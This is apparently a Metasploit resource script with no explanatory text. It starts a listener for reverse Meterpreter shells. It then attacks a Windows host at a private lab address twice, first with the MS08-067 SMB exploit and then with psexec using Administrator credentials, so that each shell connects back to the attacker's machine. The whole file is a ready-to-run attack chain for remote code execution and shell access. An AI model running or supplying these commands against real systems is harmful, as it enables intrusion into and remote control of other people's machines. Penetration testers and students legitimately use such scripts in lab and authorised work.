 use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.2.101
exploit -j -z
setg DisablePayloadHandler 1
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.2.167
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.2.101
exploit -j -Z
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass PLACEHOLDER
set RHOST 192.168.2.167
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.2.101
exploit -j -Z
